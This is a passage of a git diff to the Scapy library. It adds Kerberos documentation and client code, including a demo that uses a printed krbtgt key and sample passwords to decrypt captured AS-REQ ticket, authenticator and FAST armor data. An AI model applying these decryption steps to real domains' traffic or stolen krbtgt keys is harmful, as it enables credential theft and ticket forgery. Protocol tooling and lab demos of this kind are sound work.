Ether(hex_bytes(b'52540013d0835254003ea3be08004502089636a1400080063ad3c0a87fd2c0a87fc8fecc0058eea93069573b278e50180402897400000000086a6a82086630820862a103020105a20302010aa38207a23082079e3082079aa10402020088a28207900482078ca082078830820784a082064a30820646a003020101a182063d048206396e82063530820631a003020105a10302010ea20703050000000000a38205796182057530820571a003020105a10c1b0a444f4d312e4c4f43414ca21f301da003020102a11630141b066b72627467741b0a444f4d312e4c4f43414ca382053930820535a003020112a103020102a282052704820523acc8b7671c0d50522f1a8d8452ce450aceb40fff0229e8ee546bccf1512e4877ef93dde465595260a6a5a8e85ea38600ce8dff7d510f3c744e2c43eb9d3187d638f716c29b6e7aa9eb407de28d0161f49013966eda0a161ff174dad42e7aa500cfe298541215448013ffe4883b6b1166f908f50de129487fe77fff874fd4102cdcce8db8dbeb8da02f08cc88b3790cdad5ec499959c7e79d6fef107d1e17ce80cc3df050b7e7a1c31f278e4fd4ea9523c950876f174be363234f8495b9550de1560ba17daeafbf133f78991053d929ad3fd668327d42288e6581671daaef908682ee282e17c31d8f8bb55d27fce155ee2e84a2ff8bc9600891be15e6ede3e1bbd2742a7af8b0a32c48973c9e3776a69647bab11592756c5a15b9101c392efa35d000abb3dabccd97e64426e3fd8d47e0e369c83b5391f38947d536d351c061081d654eef1a3861cdb2ea2bc48222b450d1b7d09c0670493bccc60dfcaa5cfe46fd50adf8e388204a4691dc5f0c3dbae0b4da6ac2dd781f149a444840aaa3a3c3befb5a5c04ee0405baed66afcf9b988d10ea14a955f43df79465e6fc02a12bce3870988950f1ab48e1a4f876f351671c5061e6399a63cb0479f7bd017dfd9bc5be192faf6d4f11e6ee6003933eeaf632f0056c4c1ccd183d7977cfca85419fe5b039674419d802068e792c9576ae2a88bfbeb1f59273226782c6efb288717d8f7a4bc3bf4c697fcac1adc1829f0a914f2559b278ccadd108eb87a11dacc88e4302e9af627474e57171192b94c6b358f8f98e308596215d2fb9d9c2b49c4cbedcb43fc231b86f0493d56b82962cf3383a84f8922c2b99f8fa8fdd85797b09a6e60f72007c0379988be2ff1cfc16f21300c1b4b784174005a9185f760e68ef94b9384eb24decee31b63d1b92278cd75b85d4d80c4e83306533a9d95aa6207cbfbeb0970a41c44aba59839f007923ecd8ff0de8314990a435dbea4dedbee16faf5ab2be9f96d691cfa983a6c843bd183f84c1b4998a3eaa907cae6b82b0ae8363f3edd8cb03d3c9c60ff55a84d8a292ea20555fbd6ce5ad4ad7a6b4bc5bff2e02c477a7a8a98d5a387d389caa172c400b151d95871b2aa16a040dc71a9be5f0774b06a5ca87674ccb4109a2c41db9e3160704218ad495d0751194fbef4becae4d7be24b9d968da592256a2b22cf724e989e71a60d0603b59bebd475285f793794b7a18af49a2b68670e3a6247c453274e35c863a16b5023c6c94659e25abb27c760f989ac0bbf9a5b125d0ea34fb03225cc93d5b8b6829e906883ee76cf8ee61dfacc488e8dc5cbc8ba9705a9e915a68f838232394f97fb1aac4a2a90fe17d46f9c51946a2bf9598df7f5b5e7ee692a78860eea3cef748a5be36529228e40b4aec83ebc8bb14176a4c565b06500e9517229b8340c55812101dbbc6bee693c35873082a5a1a53b35cf3509193d4dc5175c9360a00da71692ba205b3264aecc9ecc8bca31fec43efc8701423bb484f6f21699439dd30f71228f16eaab96b7de3547721d1635bbfe50678900ac378a4958b6c34964f3e0dc843880dbde57fb4a76ab85eba2b190bfdaefc7ba17e109f839493b0f2d6fc7ea17403bebe06f2809314ca514606f54668082364ed6752019f27e1df74f93fcf1c25630a29713a89d4a998c444bc91279c6fc66e0aa5dec72be316e1160cf9f90d5915c464b6bfec5216e901be4726db596a15745511c63736a69ac9ecb9e86601c631b4992653c320e6983562fa613134560cb606621e9661ac5961313ee70868ab48d6010173d8a96fffdb2baf4afe18c846d3fed6f30b9a809d72e647735fc536edec543abc232480d28660395a4819e30819ba003020112a281930481901273d5af61ad426d51d0757e897917caeb6fc1b6950554e8d750f95d27f444e3aaf7ae0bf4595b5e906d9682dbdeedcf6eb42a84ab8092997b783f57710127228165deeb2ce5e09e2ddc71555dc31970a8312d888b8ae766382098276d62b4bd76f34cbc889e24ad5405ec037ceb724fdb71fe247fe2a414a037ed33c796f4475fcfb5993eed147b6d63d740d58da5b0a1173015a003020110a10e040ca75f26db2301c6970feba452a282011930820115a003020112a282010c048201083caf34ecefd84c786703c20039de61bc01ebed9be7e51c90a582fec852696bf92fd165cd5b5ef0f9b8edb666c9cca5690d364e5c6ad69e7d5bc7e055757aaa6206428a302524144d5d97cc0b64db13335045039171ed1f0d111ca1bd4651ebca3d74db029e5c6d3c7f8600c44e55b14cd3c7f6a15c9133400e4255d71f237bf288c186137cd04a5f2cabba3166de5bf11190a2e5962e4dbbfb9801e3be73ede5a536eb27a086b644f12245198459c063b8ecba228e1f9209e05a5bcbb39a12651e103438ee7998e666d8628812fa34bc07f4c4d0a4d86fe207128de37e1ffd169a4cb879cb5b9db8f9c3e86143bfd43409ca47e90f3bc848a1838fce7209f57296e44963a2d1e3d4a481af3081aca00703050040810010a11a3018a003020101a111300f1b0d61646d2d722d786d617274696ea2061b04444f4d31a3193017a003020102a110300e1b066b72627467741b04444f4d31a511180f32303337303931333032343830355aa611180f32303337303931333032343830355aa70602043f58a7a0a81530130201120201110201170201180202ff79020103a91d301b3019a003020114a112041053525620202020202020202020202020')) + >>> pkt[TCP].payload.show() + ###[ KerberosTCPHeader ]### + len = 2154 + ###[ Kerberos ]### + \root \ + |###[ KRB_AS_REQ ]### + | pvno = 0x5 + | msgType = 'AS-REQ' 0xa + | \padata \ + | |###[ PADATA ]### + | | padataType= 'PA-FX-FAST' 0x88 + | | \padataValue\ + | | |###[ PA_FX_FAST_REQUEST ]### + | | | \armoredData\ + | | | |###[ KrbFastArmoredReq ]### + | | | | \armor \ + | | | | |###[ KrbFastArmor ]### + | | | | | armorType = 'FX_FAST_ARMOR_AP_REQUEST' 0x1 + | | | | | \armorValue\ + | | | | | |###[ KRB_AP_REQ ]### + | | | | | | pvno = 0x5 + | | | | | | msgType = 'AP-REQ' 0xe + | | | | | | apOptions = + | | | | | | \ticket \ + | | | | | | |###[ KRB_Ticket ]### + | | | | | | | tktVno = 0x5 + | | | | | | | realm = + | | | | | | | \sname \ + | | | | | | | |###[ PrincipalName ]### + | | | | | | | | nameType = 'NT-SRV-INST' 0x2 + | | | | | | | | nameString= [, ] + | | | | | | | \encPart \ + | | | | | | | |###[ EncryptedData ]### + | | | | | | | | etype = 'AES-256' 0x12 + | | | | | | | | kvno = 0x2 + | | | | | | | | cipher = \xea\xf62\xf0\x05lL\x1c\xcd\x18=yw\xcf\xca\x85A\x9f\xe5\xb09gD\x19\xd8\x02\x06\x8ey,\x95v\xae*\x88\xbf\xbe\xb1\xf5\x92s"g\x82\xc6\xef\xb2\x88q}\x8fzK\xc3\xbfLi\x7f\xca\xc1\xad\xc1\x82\x9f\n\x91O%Y\xb2x\xcc\xad\xd1\x08\xeb\x87\xa1\x1d\xac\xc8\x8eC\x02\xe9\xafbtt\xe5qq\x19+\x94\xc6\xb3X\xf8\xf9\x8e0\x85\x96!]/\xb9\xd9\xc2\xb4\x9cL\xbe\xdc\xb4?\xc21\xb8o\x04\x93\xd5k\x82\x96,\xf38:\x84\xf8\x92,+\x99\xf8\xfa\x8f\xdd\x85y{\t\xa6\xe6\x0fr\x00|\x03y\x98\x8b\xe2\xff\x1c\xfc\x16\xf2\x13\x00\xc1\xb4\xb7\x84\x17@\x05\xa9\x18_v\x0eh\xef\x94\xb98N\xb2M\xec\xee1\xb6=\x1b\x92\'\x8c\xd7[\x85\xd4\xd8\x0cN\x830e3\xa9\xd9Z\xa6 |\xbf\xbe\xb0\x97\nA\xc4J\xbaY\x83\x9f\x00y#\xec\xd8\xff\r\xe81I\x90\xa45\xdb\xeaM\xed\xbe\xe1o\xafZ\xb2\xbe\x9f\x96\xd6\x91\xcf\xa9\x83\xa6\xc8C\xbd\x18?\x84\xc1\xb4\x99\x8a>\xaa\x90|\xaek\x82\xb0\xae\x83c\xf3\xed\xd8\xcb\x03\xd3\xc9\xc6\x0f\xf5Z\x84\xd8\xa2\x92\xea U_\xbdl\xe5\xadJ\xd7\xa6\xb4\xbc[\xff.\x02\xc4w\xa7\xa8\xa9\x8dZ8}8\x9c\xaa\x17,@\x0b\x15\x1d\x95\x87\x1b*\xa1j\x04\r\xc7\x1a\x9b\xe5\xf0wK\x06\xa5\xca\x87gL\xcbA\t\xa2\xc4\x1d\xb9\xe3\x16\x07\x04!\x8a\xd4\x95\xd0u\x11\x94\xfb\xefK\xec\xaeM{\xe2K\x9d\x96\x8d\xa5\x92%j+"\xcfrN\x98\x9eq\xa6\r\x06\x03\xb5\x9b\xeb\xd4u(_y7\x94\xb7\xa1\x8a\xf4\x9a+hg\x0e:bG\xc4S\'N5\xc8c\xa1kP#\xc6\xc9FY\xe2Z\xbb\'\xc7`\xf9\x89\xac\x0b\xbf\x9a[\x12]\x0e\xa3O\xb02%\xcc\x93\xd5\xb8\xb6\x82\x9e\x90h\x83\xeev\xcf\x8e\xe6\x1d\xfa\xccH\x8e\x8d\xc5\xcb\xc8\xba\x97\x05\xa9\xe9\x15\xa6\x8f\x83\x8229O\x97\xfb\x1a\xacJ*\x90\xfe\x17\xd4o\x9cQ\x94j+\xf9Y\x8d\xf7\xf5\xb5\xe7\xeei*x\x86\x0e\xea<\xeft\x8a[\xe3e)"\x8e@\xb4\xae\xc8>\xbc\x8b\xb1Av\xa4\xc5e\xb0e\x00\xe9Qr)\xb84\x0cU\x81!\x01\xdb\xbck\xeei<5\x870\x82\xa5\xa1\xa5;5\xcf5\t\x19=M\xc5\x17\\\x93`\xa0\r\xa7\x16\x92\xba [2d\xae\xcc\x9e\xcc\x8b\xca1\xfe\xc4>\xfc\x87\x01B;\xb4\x84\xf6\xf2\x16\x99C\x9d\xd3\x0fq"\x8f\x16\xea\xab\x96\xb7\xde5Gr\x1d\x165\xbb\xfePg\x89\x00\xac7\x8aIX\xb6\xc3Id\xf3\xe0\xdc\x848\x80\xdb\xdeW\xfbJv\xab\x85\xeb\xa2\xb1\x90\xbf\xda\xef\xc7\xba\x17\xe1\t\xf89I;\x0f-o\xc7\xea\x17@;\xeb\xe0o(\t1L\xa5\x14`oTf\x80\x826N\xd6u \x19\xf2~\x1d\xf7O\x93\xfc\xf1\xc2V0\xa2\x97\x13\xa8\x9dJ\x99\x8cDK\xc9\x12y\xc6\xfcf\xe0\xaa]\xecr\xbe1n\x11`\xcf\x9f\x90\xd5\x91\\FKk\xfe\xc5!n\x90\x1b\xe4rm\xb5\x96\xa1WEQ\x1ccsji\xac\x9e\xcb\x9e\x86`\x1cc\x1bI\x92e<2\x0ei\x83V/\xa6\x13\x13E`\xcb`f!\xe9f\x1a\xc5\x96\x13\x13\xeep\x86\x8a\xb4\x8d`\x10\x17=\x8a\x96\xff\xfd\xb2\xba\xf4\xaf\xe1\x8c\x84m?\xedo0\xb9\xa8\t\xd7.dw5\xfcSn\xde\xc5C\xab\xc22H\r(f\x03\x95']> + | | | | | | \authenticator\ + | | | | | | |###[ EncryptedData ]### + | | | | | | | etype = 'AES-256' 0x12 + | | | | | | | kvno = None + | | | | | | | cipher = \xed\x14{mc\xd7@\xd5\x8d\xa5\xb0']> + | | | | checksumtype= 'HMAC-SHA1-96-AES256' 0x10 + | | | | checksum = + | | | | \encFastReq\ + | | | | |###[ EncryptedData ]### + | | | | | etype = 'AES-256' 0x12 + | | | | | kvno = None + | | | | | cipher = + | \reqBody \ + | |###[ KRB_KDC_REQ_BODY ]### + | | kdcOptions= forwardable, renewable, canonicalize, renewable-ok + | | \cname \ + | | |###[ PrincipalName ]### + | | | nameType = 'NT-PRINCIPAL' 0x1 + | | | nameString= [] + | | realm = + | | \sname \ + | | |###[ PrincipalName ]### + | | | nameType = 'NT-SRV-INST' 0x2 + | | | nameString= [, ] + | | from = None + | | till = 2037-09-13 02:48:05 UTC + | | rtime = 2037-09-13 02:48:05 UTC + | | nonce = 0x3f58a7a0 + | | etype = [0x12 , 0x11 , 0x17 , 0x18 , -0x87 , 0x3 ] + | | \addresses \ + | | |###[ HostAddress ]### + | | | addrType = 'NetBios' 0x14 + | | | address = + | | encAuthorizationData= None + | | additionalTickets= None + +There are 3 encrypted payloads: + +- ``pkt.root.padata[0].padataValue.armoredData.armor.armorValue.ticket.encPart``, encrypted using the KRBTGT +- ``pkt.root.padata[0].padataValue.armoredData.armor.armorValue.authenticator``, encrypted using the ticket session key (that the clients gets from the first AS-REQ, and that that is also included in tickets for the server to use) +- ``pkt.root.padata[0].padataValue.armoredData.encFastReq``, encrypted using using the armor key + +We have the krbtgt for this demo: + +.. code:: pycon + + >>> from scapy.libs.rfc3961 import Key, EncryptionType + >>> krbtgt_hex = "ac67a63d7155791fe31dace230ab516e818c453dfdbd44cbe691b240725c4907" + >>> krbtgt = Key(EncryptionType.AES256, key=hex_bytes(krbtgt_hex)) + +We can therefore decrypt the first payload: + +.. code:: pycon + + >>> enc = pkt.root.padata[0].padataValue.armoredData.armor.armorValue.ticket.encPart + >>> encticketpart = enc.decrypt(krbtgt) + >>> encticketpart.show() + ###[ EncTicketPart ]### + flags = forwardable, renewable, initial, pre-authent + \key \ + |###[ EncryptionKey ]### + | keytype = 'AES-256' 0x12 + | keyvalue = B\xd8)m/G\x82B;\x9f+\x86\xcd\xcd\xf4\x05']> + crealm = + \cname \ + |###[ PrincipalName ]### + | nameType = 'NT-PRINCIPAL' 0x1 + | nameString= [] + \transited \ + |###[ TransitedEncoding ]### + | trType = 0x0 + | contents = + authtime = 2022-07-12 23:02:25 UTC + starttime = 2022-07-12 23:02:25 UTC + endtime = 2022-07-13 09:02:25 UTC + renewTill = 2022-07-19 23:02:25 UTC + addresses = None + [...] + +We can see the ticket session key in there, let's retrieve it and build a ``Key`` object: + +.. note:: We use the ``.toKey()`` function in the ``EncryptedKey`` type which is a shorthand for ``Key(, key=)`` + +.. code:: pycon + + >>> ticket_session_key = encticketpart.key.toKey() + >>> ticket_session_key.key + b'\xe3\xa2\x0f\x8e\xb2\xe1*\xe0\x7f\x86\xcc\x88\xe6,\x08>B\xd8)m/G\x82B;\x9f+\x86\xcd\xcd\xf4\x05' + +We can now decrypt the second payload: + +.. code:: pycon + + >>> enc = pkt.root.padata[0].padataValue.armoredData.armor.armorValue.authenticator + >>> authenticator = enc.decrypt(ticket_session_key) + >>> authenticator.show() + ###[ KRB_Authenticator ]### + authenticatorPvno= 0x5 + crealm = + \cname \ + |###[ PrincipalName ]### + | nameType = 'NT-PRINCIPAL' 0x1 + | nameString= [] + checksumtype= 0x0 + checksum = + cusec = 0x3c + ctime = 2022-07-12 23:54:37 UTC + \subkey \ + |###[ EncryptionKey ]### + | keytype = 'AES-256' 0x12 + | keyvalue = + seqNumber = 0x0 + encAuthorizationData= None + +Again, we see inside this the subkey that is used to compute the armor key. We get it: + +.. code:: pycon + + >>> subkey = authenticator.subkey.toKey() + >>> subkey.key + b'%\xa4n\xe1\xd0\xf5\x8d\xc4\x8d\xecv\xe8\x9c\xd3\xc9\xee\x1bu\xc9\xa5\xa6\xf8\x83f\x98\xa1\xd9\xe7*I\x9b\xf8' + +Following `RFC6113 sect 5.4.1.1 `_, we can now compute the armor key using: + +.. code:: pycon + + >>> from scapy.libs.rfc3961 import KRB_FX_CF2 + >>> armorkey = KRB_FX_CF2(subkey, ticket_session_key, b"subkeyarmor", b"ticketarmor") + >>> print(armorkey.key) + b'\x9f\x18L]I\x16\xd0\xe5\xa6\xd9\x92+\xbf\xbc\xe0\n\xd1\xcb6\xf3\xd1.C\xc2\xdcp\xf0H(\x99\x14\x80' + +That we can now use to decrypt the last payload: + +.. code:: pycon + + >>> enc = pkt.root.padata[0].padataValue.armoredData.encFastReq + >>> krbfastreq = enc.decrypt(armorkey) + >>> krbfastreq.show() + ###[ KrbFastReq ]### + fastOptions= + \padata \ + |###[ PADATA ]### + | padataType= 'PA-PAC-REQUEST' 0x80 + | \padataValue\ + | |###[ PA_PAC_REQUEST ]### + | | includePac= True + |###[ PADATA ]### + | padataType= 'PA-PAC-OPTIONS' 0xa7 + | \padataValue\ + | |###[ PA_PAC_OPTIONS ]### + | | options = Claims + \reqBody \ + |###[ KRB_KDC_REQ_BODY ]### + | kdcOptions= forwardable, renewable, canonicalize, renewable-ok + | \cname \ + | |###[ PrincipalName ]### + | | nameType = 'NT-PRINCIPAL' 0x1 + | | nameString= [] + | realm = + | \sname \ + | |###[ PrincipalName ]### + | | nameType = 'NT-SRV-INST' 0x2 + | | nameString= [, ] + | from = None + | till = 2037-09-13 02:48:05 UTC + | rtime = 2037-09-13 02:48:05 UTC + | nonce = 0x3f58a7a0 + | etype = [0x12 , 0x11 , 0x17 , 0x18 , -0x87 , 0x3 ] + | \addresses \ + | |###[ HostAddress ]### + | | addrType = 'NetBios' 0x14 + | | address = + | encAuthorizationData= None + | additionalTickets= None + +Encryption +---------- + +A :func:`~scapy.libs.rfc3961.Key.encrypt` function exists in the :class:`~scapy.libs.rfc3961.Key` object in order to do the opposite of :func:`~scapy.libs.rfc3961.Key.decrypt`. + + +For instance, during pre-authentication, encode ``PA-ENC-TIMESTAMP``: + +.. code:: pycon + + >>> from datetime import datetime + >>> from scapy.libs.rfc3961 import Key, EncryptionType + >>> # Create the PADATA layer with its EncryptedValue + >>> pkt = PADATA(padataType=0x2, padataValue=EncryptedData()) + >>> # Compute the key + >>> key = Key.string_to_key(EncryptionType.AES256, b"Password1", b"DOMAIN.LOCALUser1") + >>> now_time = datetime.now(timezone.utc).replace(microsecond=0) # Current time with no milliseconds + >>> # Encrypt + >>> pkt.padataValue.encrypt(key, PA_ENC_TS_ENC(patimestamp=ASN1_GENERALIZED_TIME(now_time))) + >>> pkt.show() + ###[ PADATA ]### + padataType= 2 + \padataValue\ + |###[ EncryptedData ]### + | etype = 18 + | kvno = 0x0 + | cipher = b"\xc1\x9a\xaf\x89V\x16\x82\xb6\x9a\xcb\x15[\xaf\xed\xd9\xfc\x04\xbf\x18\xd4&\x91\xb3\xcf~tEk,\x98m\xee\xa4O\x05=\x11b\xe05\xca\x92+80\x99\xb1'~\x8d\xdbtz\xa8" diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index fe27dd81fc7..5e18ff2bb24 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -253,11 +253,11 @@ def BER_tagging_dec(s, # type: bytes return real_tag, s -def BER_tagging_enc(s, implicit_tag=None, explicit_tag=None): - # type: (bytes, Optional[int], Optional[int]) -> bytes +def BER_tagging_enc(s, hidden_tag=None, implicit_tag=None, explicit_tag=None): + # type: (bytes, Optional[Any], Optional[int], Optional[int]) -> bytes if len(s) > 0: if implicit_tag is not None: - s = BER_id_enc(implicit_tag) + s[1:] + s = BER_id_enc((hash(hidden_tag) & ~(0x1f)) | implicit_tag) + s[1:] elif explicit_tag is not None: s = BER_id_enc(explicit_tag) + BER_len_enc(len(s)) + s return s diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 1aa1bb7a019..816f0f823be 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -165,7 +165,8 @@ def i2m(self, pkt, x): raise ASN1_Error("Encoding Error: got %r instead of an %r for field [%s]" % (x, self.ASN1_tag, self.name)) # noqa: E501 else: s = self.ASN1_tag.get_codec(pkt.ASN1_codec).enc(x) - return BER_tagging_enc(s, implicit_tag=self.implicit_tag, + return BER_tagging_enc(s, hidden_tag=self.ASN1_tag, + implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag) def any2i(self, pkt, x): @@ -752,7 +753,8 @@ def i2m(self, pkt, x): s = raw(x) if hash(type(x)) in self.pktchoices: imp, exp = self.pktchoices[hash(type(x))] - s = BER_tagging_enc(s, implicit_tag=imp, + s = BER_tagging_enc(s, hidden_tag=self.ASN1_tag, + implicit_tag=imp, explicit_tag=exp) return BER_tagging_enc(s, explicit_tag=self.explicit_tag) @@ -836,7 +838,8 @@ def i2m(self, s = b"" else: s = raw(x) - return BER_tagging_enc(s, implicit_tag=self.implicit_tag, + return BER_tagging_enc(s, hidden_tag=self.ASN1_tag, + implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag) def randval(self): diff --git a/scapy/fields.py b/scapy/fields.py index ca09da317c3..43963c6b935 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1527,7 +1527,11 @@ def randval(self): class PacketField(_PacketField[BasePacket]): - pass + def any2i(self, pkt, x): + # type: (Optional[Packet], BasePacket) -> BasePacket + if x and pkt and hasattr(x, "add_parent"): + cast("Packet", x).add_parent(pkt) + return super(PacketField, self).any2i(pkt, x) class PacketLenField(_PacketField[Optional[BasePacket]]): @@ -1693,9 +1697,15 @@ class object defining a ``dispatch_hook`` class method def any2i(self, pkt, x): # type: (Optional[Packet], Any) -> List[BasePacket] if not isinstance(x, list): + if x and pkt and hasattr(x, "add_parent"): + x.add_parent(pkt) return [x] - else: - return x + elif pkt: + for i in x: + if not i or not hasattr(i, "add_parent"): + continue + i.add_parent(pkt) + return x def i2count(self, pkt, # type: Optional[Packet] diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 85d7a585beb..6145e88b84f 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -7,10 +7,14 @@ Kerberos V5 Implements parts of: + - Kerberos Network Authentication Service (V5): RFC4120 - Kerberos Version 5 GSS-API: RFC1964, RFC4121 - Kerberos Pre-Authentication: RFC6113 (FAST) +You will find more complete documentation for this layer over +`Kerberos `_ + Example decryption: >>> from scapy.libs.rfc3961 import Key, EncryptionType @@ -31,10 +35,19 @@ >>> enc.decrypt(k) """ +from collections import namedtuple +from datetime import datetime, timedelta +import re +import socket import struct import scapy.asn1.mib # noqa: F401 from scapy.asn1.asn1 import ( + ASN1_BIT_STRING, + ASN1_BOOLEAN, + ASN1_GENERAL_STRING, + ASN1_GENERALIZED_TIME, + ASN1_INTEGER, ASN1_SEQUENCE, ASN1_STRING, ASN1_Class_UNIVERSAL, @@ -57,21 +70,30 @@ ASN1F_optional, ) from scapy.asn1packet import ASN1_Packet +from scapy.automaton import Automaton, ATMT +from scapy.compat import bytes_encode +from scapy.error import log_runtime from scapy.fields import ( ByteField, + FieldLenField, FlagsField, + LEIntEnumField, LEIntField, + LELongField, LenField, LEShortEnumField, LEShortField, + PacketListField, PadField, ShortField, + StrField, StrFixedLenEnumField, XStrFixedLenField, ) from scapy.layers.inet import TCP, UDP from scapy.packet import Packet, bind_bottom_up, bind_layers -from scapy.volatile import GeneralizedTime +from scapy.supersocket import StreamSocket +from scapy.volatile import GeneralizedTime, RandNum # kerberos APPLICATION @@ -93,7 +115,7 @@ class ASN1F_KRB_APPLICATION(ASN1F_SEQUENCE): ASN1_tag = ASN1_Class_KRB.APPLICATION -# sect 5.2 +# RFC4120 sect 5.2 KerberosString = ASN1F_GENERAL_STRING @@ -157,6 +179,64 @@ class HostAddress(ASN1_Packet): name, [], HostAddress, **kwargs ) +Checksum = lambda **kwargs: ASN1F_SEQUENCE( + ASN1F_enum_INTEGER( + "checksumtype", + 0, + { + # RFC3961 sect 8 + 1: "CRC32", + 2: "RSA-MD4", + 3: "RSA-MD4-DES", + 4: "DES-MAC", + 5: "DES-MAC-K", + 6: "RSA-MD4-DES-K", + 7: "RSA-MD5", + 8: "RSA-MD5-DES", + 9: "RSA-MD5-DES3", + 10: "SHA1", + 12: "HMAC-SHA1-DES3-KD", + 13: "HMAC-SHA1-DES3", + 14: "SHA1", + 15: "HMAC-SHA1-96-AES128", + 16: "HMAC-SHA1-96-AES256", + }, + explicit_tag=0xA0, + ), + ASN1F_STRING("checksum", "", explicit_tag=0xA1), + **kwargs +) + +_AUTHORIZATIONDATA_VALUES = { + # Filled below +} + + +class _ASN1FString_PacketField(ASN1F_STRING): + holds_packets = 1 + + def i2m(self, pkt, val): + if isinstance(val, ASN1_Packet): + val = ASN1_STRING(bytes(val)) + return super(_ASN1FString_PacketField, self).i2m(pkt, val) + + def any2i(self, pkt, x): + if hasattr(x, "add_underlayer"): + x.add_underlayer(pkt) + return super(_ASN1FString_PacketField, self).any2i(pkt, x) + + +class _AuthorizationData_value_Field(_ASN1FString_PacketField): + def m2i(self, pkt, s): + val = super(_AuthorizationData_value_Field, self).m2i(pkt, s) + if pkt.adType.val in _PADATA_CLASSES: + cls = _AUTHORIZATIONDATA_VALUES.get(pkt.adType.val, None) + if not val[0].val: + return val + if cls: + return cls(val[0].val, _underlayer=pkt), b"" + return val + class AuthorizationDataItem(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -182,54 +262,95 @@ class AuthorizationDataItem(ASN1_Packet): }, explicit_tag=0xA0, ), - ASN1F_STRING("adData", "", explicit_tag=0xA1), + _AuthorizationData_value_Field("adData", "", explicit_tag=0xA1), ) -AuthorizationData = lambda name, **kwargs: ASN1F_SEQUENCE_OF( - name, [], AuthorizationDataItem, **kwargs -) -ADIFRELEVANT = AuthorizationData -Checksum = lambda **kwargs: ASN1F_SEQUENCE( - ASN1F_enum_INTEGER( - "checksumtype", - 0, - { - # RFC3961 sect 8 - 1: "CRC32", - 2: "RSA-MD4", - 3: "RSA-MD4-DES", - 4: "DES-MAC", - 5: "DES-MAC-K", - 6: "RSA-MD4-DES-K", - 7: "RSA-MD5", - 8: "RSA-MD5-DES", - 9: "RSA-MD5-DES3", - 10: "SHA1", - 12: "HMAC-SHA1-DES3-KD", - 13: "HMAC-SHA1-DES3", - 14: "SHA1", - 15: "HMAC-SHA1-96-AES128", - 16: "HMAC-SHA1-96-AES256", - }, - explicit_tag=0xA0, - ), - ASN1F_STRING("checksum", "", explicit_tag=0xA1), - **kwargs -) -ADKDCIssued = ASN1F_SEQUENCE( - Checksum(explicit_tag=0xA0), - ASN1F_optional( - Realm("iRealm", "", explicit_tag=0xA1), - ), - ASN1F_optional(ASN1F_PACKET("iSname", None, PrincipalName, explicit_tag=0xA2)), - AuthorizationData("elements", explicit_tag=0xA3), -) -ASANDOR = ASN1F_SEQUENCE( - Int32("conditionCount", 0, explicit_tag=0xA1), - AuthorizationData("elements", explicit_tag=0xA1), -) +class AuthorizationData(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF( + "seq", [AuthorizationDataItem()], AuthorizationDataItem + ) + + +AD_IF_RELEVANT = AuthorizationData +_AUTHORIZATIONDATA_VALUES[1] = AD_IF_RELEVANT + + +class AD_KDCIssued(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Checksum(explicit_tag=0xA0), + ASN1F_optional( + Realm("iRealm", "", explicit_tag=0xA1), + ), + ASN1F_optional(ASN1F_PACKET("iSname", None, PrincipalName, explicit_tag=0xA2)), + ASN1F_PACKET("elements", None, AuthorizationData, explicit_tag=0xA3), + ) + + +_AUTHORIZATIONDATA_VALUES[4] = AD_KDCIssued + + +class AD_AND_OR(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Int32("conditionCount", 0, explicit_tag=0xA0), + ASN1F_PACKET("elements", None, AuthorizationData, explicit_tag=0xA1), + ) + + +_AUTHORIZATIONDATA_VALUES[5] = AD_AND_OR + ADMANDATORYFORKDC = AuthorizationData +_AUTHORIZATIONDATA_VALUES[8] = ADMANDATORYFORKDC + + +# [MS-PAC] + + +# sect 2.4 +class PAC_INFO_BUFFER(Packet): + fields_desc = [ + LEIntEnumField( + "ulType", + 0x00000001, + { + 0x00000001: "Logon information", + 0x00000002: "Credentials information", + 0x00000006: "Server checksum", + 0x00000007: "KDC checksum", + 0x0000000A: "Client name and ticket information", + 0x0000000B: "Constrained delegation information", + 0x0000000C: "UPN and DNS information", + 0x0000000D: "Client claims information", + 0x0000000E: "Device information", + 0x0000000F: "Device claims information", + 0x00000010: "Ticket checksum", + }, + ), + LEIntField("cbBufferSize", 0), + LELongField("Offset", 0), + ] + + +class PACTYPE(Packet): + fields_desc = [ + FieldLenField("cBuffers", None, count_of="Buffers", fmt=", sessionkey=<...>) + + Example:: + + >>> # The KDC is on 192.168.122.17, we ask a TGT for user1 + >>> krb_as_req("user1@DOMAIN.LOCAL", "192.168.122.17", password="Password1") + + Equivalent:: + + >>> from scapy.libs.rfc3961 import Key, EncryptionType + >>> key = Key(EncryptionType.AES256, key=hex_bytes("6d0748c546f4e99205 + ...: e78f8da7681d4ec5520ae4815543720c2a647c1ae814c9")) + >>> krb_as_req("user1@DOMAIN.LOCAL", "192.168.122.17", key=key) + """ + m = re.match(r"^([^@\\]+)(@|\\)([^@\\]+)$", upn) + if not m: + raise ValueError("Invalid UPN !") + if m.group(2) == "@": + user = m.group(1) + domain = m.group(3) + else: + user = m.group(3) + domain = m.group(1) + if key is None: + if password is None: + try: + from prompt_toolkit import prompt + + password = prompt("Enter password: ", is_password=True) + except ImportError: + password = input("Enter password: ") + if user.endswith("$"): + # Machine account + salt = ( + domain.upper().encode() + + b"host" + + user.lower().encode() + + b"." + + domain.lower().encode() + ) + else: + salt = domain.upper().encode() + user.encode() + from scapy.libs.rfc3961 import Key, EncryptionType + + key = Key.string_to_key(EncryptionType.AES256, password.encode(), salt) + cli = KerberosClient( + domain=domain, ip=ip, host="WIN1", user=user, key=key, **kwargs + ) + cli.run() + cli.stop() + return cli.result diff --git a/scapy/libs/rfc3961.py b/scapy/libs/rfc3961.py index ef205866dad..03d4d08790a 100644 --- a/scapy/libs/rfc3961.py +++ b/scapy/libs/rfc3961.py @@ -20,9 +20,15 @@ from scapy.compat import orb, chb, int_bytes, bytes_int, plain_str try: - from Cryptodome.Cipher import AES, DES3, ARC4, DES - from Cryptodome.Hash import HMAC, MD4, 